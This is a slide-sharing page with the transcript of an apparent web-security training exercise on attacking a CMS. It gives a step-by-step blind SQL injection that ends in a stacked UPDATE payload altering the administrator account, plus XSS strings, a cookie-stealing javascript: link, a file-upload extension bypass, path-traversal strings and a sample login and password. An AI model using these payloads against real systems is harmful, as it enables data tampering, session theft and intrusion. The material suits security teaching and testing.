Security Breach: Detecting and Exploiting SQL Injection in Contact Groups

Slide Note
Embed
Share

Suspect a potential SQL injection in the macros used in Contact groups? Learn how to identify and exploit it through blind SQL injection techniques. Follow step-by-step instructions to execute a payload that alters user data and gain unauthorized access. Stay vigilant and proactively safeguard your data integrity.


Uploaded on Apr 02, 2024 | 3 Views


Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

E N D

Presentation Transcript


  1. 1. Broken Access Control 3. Injection 4. Insecure Design

  2. { userId: 1, newPass: **** }

  3. We suspect that one of the macros used in Contact groups contains SQL injection, try to find and exploit it! This is a blind SQL injection - you won t see the result in response, but injected query will execute on background. If the query fails, it will be logged to Event log

  4. 1. Go to Contact Groups, create new group and go to Conditions. 2. Select 'Contact has value in field' macro. It allows us to insert arbitrary input before operator in where clause (e.g. WHERE <field> contains <value>). You can identify it by inserting `, recalculating group and then checking event log. 3. Final payload (change FirstName of the administrator account) 1=1; UPDATE CMS_User SET FirstName='Joe' WHERE UserID = 53-- Finish the WHERE clause of the original query with any True statement, e.g. 1=1 Add ; to finish first query Arbitrary query to drop table, dump data or anything Comment out everything else with --

  5. Event log user@localhost.local Pass.word1 Digital Channel Manager Users

  6. Users Roles Event log

  7. administrator Users

  8. Users email email queue

  9. Send us a message

  10. <img src=0 onerror=alert(1) /> Contact management

  11. http(s):// Forms application

  12. javascript:alert(document.cookie)

  13. file upload xml file Cafe

  14. /api/cmd allowedExtensions 3. Resend / edit change png to xml (/getmedia/.../payload.xml

  15. ../..

  16. ..\..\.

Related


More Related Content